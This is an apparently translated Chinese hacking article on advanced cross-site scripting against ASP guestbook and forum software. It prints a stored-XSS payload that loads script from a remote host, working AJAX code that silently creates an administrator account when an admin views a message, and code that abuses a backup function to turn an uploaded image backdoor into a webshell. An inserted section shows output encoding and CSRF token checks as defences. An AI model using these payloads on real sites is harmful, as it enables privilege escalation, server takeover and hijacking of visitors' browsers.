Advanced uses of XSS


Author: cnryan @ http://hi.baidu.com/cnryan

In the past, most XSS exploitation aimed at planting Trojans (drive-by downloads), phishing and cookie theft. Those uses never brought out the real power of XSS, because few people understand its essence. Combined with session hijacking and browser hijacking, XSS reaches far beyond what most people imagine.


1. Privilege escalation through XSS
With AJAX now in use on many large SNS sites, XSS has become more and more common, and using AJAX inside an XSS payload makes it far more effective.
The easiest places to find XSS are user-input points such as guestbooks and comments. I set up an sdbook guestbook; because sdbook does not properly filter user-supplied variables, it yields an XSS instance.
The message is shown first to the administrator, whose browser is hijacked by our JavaScript, so we can do anything with the administrator's privileges, such as adding an administrator.



Enter the cross-site code in the message content:
<script>s=document.createElement("script");s.src="http://www.xss.com/xss.js";document.getElementsByTagName("head")[0].appendChild(s);</script>


This code loads a remote JS file. xss.js uses an XMLHttpRequest object to send an asynchronous request, so the form data reaches the server without a page refresh, simulating the administrator adding an administrator.


First, use Firebug to watch the network traffic while an admin is added through the normal backend form, mainly to capture the POST data (URL and field names) the request carries.




Then construct the AJAX code. xss.js:

var request = false;
if (window.XMLHttpRequest) {
    // Standards-compliant browsers (and IE7+)
    request = new XMLHttpRequest();
    if (request.overrideMimeType) {
        request.overrideMimeType("text/xml");
    }
} else if (window.ActiveXObject) {
    // Older IE: try the MSXML ProgIDs in turn and keep the first one that works
    var versions = ["Microsoft.XMLHTTP", "MSXML.XMLHTTP", "Msxml2.XMLHTTP.7.0", "Msxml2.XMLHTTP.6.0", "Msxml2.XMLHTTP.5.0", "Msxml2.XMLHTTP.4.0", "MSXML2.XMLHTTP.3.0", "MSXML2.XMLHTTP"];
    for (var i = 0; i < versions.length; i++) {
        try {
            request = new ActiveXObject(versions[i]);
            break;
        } catch (e) {}
    }
}
var xmlhttp = request;

add_admin();
function add_admin() {
    // Same path and field names as the legitimate admin form, captured with Firebug
    var url = "/sdbook/admin/AdminUser/adminUser_Add.asp";
    // Purview=%B9%DC%C0%ED%D4%B1 is "管理员" (administrator) and Submit=%CC%E1%BD%BB is
    // "提交" (submit) in GBK, the site's charset; the bytes are hard-coded as captured
    var params = "UserName=cnryan&password1=123456&password2=123456&Purview=%B9%DC%C0%ED%D4%B1&Submit=%CC%E1%BD%BB";
    xmlhttp.open("POST", url, true);
    xmlhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
    // Browsers compute Content-Length themselves; where the header is forbidden it is ignored
    xmlhttp.setRequestHeader("Content-length", params.length);
    xmlhttp.setRequestHeader("Connection", "close");
    // Asynchronous: the admin's page does not reload and nothing is displayed
    xmlhttp.send(params);
}

When the admin views the message carrying the XSS payload, the script quietly adds an administrator in the background: account cnryan, password 123456. With that account we hold the highest user privileges on the whole site.

Now consider the flow of this guestbook. At first only the admin can view the message, so only the admin receives the XSS payload. Once the content passes review it is published to the site; from then on every visitor who views it may be hit by the XSS, and we can hijack many more sessions. With enough hijacked browsers one could even launch an XSS-driven DoS attack against the server.
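As an added example (not from the original article or from sdbook), here is the server-side view of the chain above: the two defects it relies on, and how much each fix buys. The payload string and the form fields are the article's; escapeHtml, renderMessageUnsafe/renderMessageSafe, extractCsrfToken, buildAddAdminBody, adminAddAllowed, the sample admin-form HTML and its hidden field named token are our assumptions, not sdbook's code.

```javascript
// Added example, not part of the original article or of sdbook.

// Payload from the article, kept here as constructed test input.
const PAYLOAD =
  '<script>s=document.createElement("script");s.src="http://www.xss.com/xss.js";' +
  'document.getElementsByTagName("head")[0].appendChild(s);</script>';

// Defect 1 (the XSS): the guestbook echoes the message into HTML verbatim.
function renderMessageUnsafe(msg) {
  return '<div class="msg">' + msg + '</div>';
}

// Fix for defect 1: HTML-entity-encode every untrusted value on output.
const ENTITIES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => ENTITIES[c]);
}
function renderMessageSafe(msg) {
  return '<div class="msg">' + escapeHtml(msg) + '</div>';
}

// Crude stand-in for "would the browser execute a script here": true when
// the rendered HTML still contains a raw <script tag.
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

// Defect 2: adminUser_Add.asp accepts any POST that carries the admin's
// cookie. The usual fix is a per-session CSRF token in the form. Sample
// admin form HTML (constructed) with a hypothetical hidden field "token".
const ADMIN_FORM_HTML =
  '<form method="post" action="adminUser_Add.asp">' +
  '<input type="hidden" name="token" value="8f3a9c2e17b4d605">' +
  '<input name="UserName"><input name="password1"></form>';

// What the injected script can do because it runs same-origin: GET the
// admin form and read the token straight out of the HTML.
function extractCsrfToken(html) {
  const m = /name="token"\s+value="([^"]+)"/i.exec(html);
  return m ? m[1] : null;
}

// The same form body xss.js sends, plus the harvested token.
// URLSearchParams percent-encodes UTF-8; the article's %B9%DC%C0%ED%D4%B1 is
// the GBK encoding of the same word, which is why the original payload
// hard-codes the bytes captured with Firebug instead of encoding at runtime.
function buildAddAdminBody(token) {
  return new URLSearchParams({
    UserName: 'cnryan',
    password1: '123456',
    password2: '123456',
    Purview: '\u7ba1\u7406\u5458', // 管理员, "administrator"
    Submit: '\u63d0\u4ea4',        // 提交, "submit"
    token: token,
  }).toString();
}

// Server-side check on adminUser_Add.asp: the POSTed token must equal the
// one stored in the admin's session.
function adminAddAllowed(sessionToken, body) {
  return new URLSearchParams(body).get('token') === sessionToken;
}
```

Output encoding stops the injected script outright. The token check on adminUser_Add.asp only blocks requests from other origins: a script injected into the admin's own page can read the token exactly as extractCsrfToken does and the POST passes adminAddAllowed, so the token is defence in depth, not a fix for the XSS.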





2. Obtaining a webshell through XSS

Why use AJAX? First, it is covert, the so-called "no refresh": the victim sees nothing. Second, it handles complex and variable data more effectively and quickly.

Does the process and code of the example above give you any further ideas?
Let's take the site's webshell.

Two conditions are necessary. First, the backend must offer a function that can be turned into a shell, such as backing up the database or writing data into the configuration file. Second, we must know details such as the website path and the default database location. Many websites have both weaknesses.



Take the database-backup route to a webshell as an example. The site lets users upload an avatar; we upload an image file with an ASP backdoor inside it and record its path: UploadFace20090901.jpg. Then, in a white-box test environment, record the POST data the backup function sends, construct the AJAX code, write it into the remote JS file and plant the JS at the site's XSS point.

The code is as follows:

var request = false;
if (window.XMLHttpRequest) {
    // Standards-compliant browsers (and IE7+)
    request = new XMLHttpRequest();
    if (request.overrideMimeType) {
        request.overrideMimeType("text/xml");
    }
} else if (window.ActiveXObject) {
    // Older IE: try the MSXML ProgIDs in turn and keep the first one that works
    var versions = ["Microsoft.XMLHTTP", "MSXML.XMLHTTP", "Msxml2.XMLHTTP.7.0", "Msxml2.XMLHTTP.6.0", "Msxml2.XMLHTTP.5.0", "Msxml2.XMLHTTP.4.0", "MSXML2.XMLHTTP.3.0", "MSXML2.XMLHTTP"];
    for (var i = 0; i < versions.length; i++) {
        try {
            request = new ActiveXObject(versions[i]);
            break;
        } catch (e) {}
    }
}
var xmlhttp = request;

getshell();
function getshell() {
    // Fields captured from the backend's own "back up database" form: dbpath is the
    // source file (%5c is an encoded backslash), bkfolder the target directory and
    // bkDBname the target file name. Pointing dbpath at the uploaded avatar and giving
    // the copy an .asp name turns the backup function into an arbitrary file copy
    var postStr = "dbpath=uploadface%5c20090901.jpg&bkfolder=Databackup&bkDBname=shell.asp";
    xmlhttp.open("POST", "/ADMIN_data.asp?Action=BackupData&act=Backup", true);
    xmlhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
    xmlhttp.setRequestHeader("Content-length", postStr.length);
    xmlhttp.setRequestHeader("Connection", "close");
    xmlhttp.send(postStr);
}

The code above was written against an open-source program I tested. Other programs differ in detail, but the pattern is the same.
getshell() makes the backup function copy uploadface20090901.jpg from the upload folder to shell.asp under the Databackup directory.

The precondition is that the site has an XSS flaw and the constructed code can be injected into a page the backend administrator views. As soon as the administrator inadvertently triggers this XSS trap, we get a webshell.



3. Open-source XSS hacking

The examples above were all tested in a white-box environment, and many of the problems are still theoretical. Exploiting XSS in a real penetration is harder, but there are solutions. The core of XSS is its flexibility and variety, which is also why it is so highly sought after. For XSS penetration, see jianxin's article.

The XSS craze has arrived. I believe penetration engineers and cross-site "masters" will push the power of XSS to its limit.



Related information:
http://www.80sec.com/xss-how-to-root.html

http://www.80sec.com/browser-hijacking.html

http://hi.baidu.com/aullik5/blog/item/6947261e7eaeaac0a7866913.html
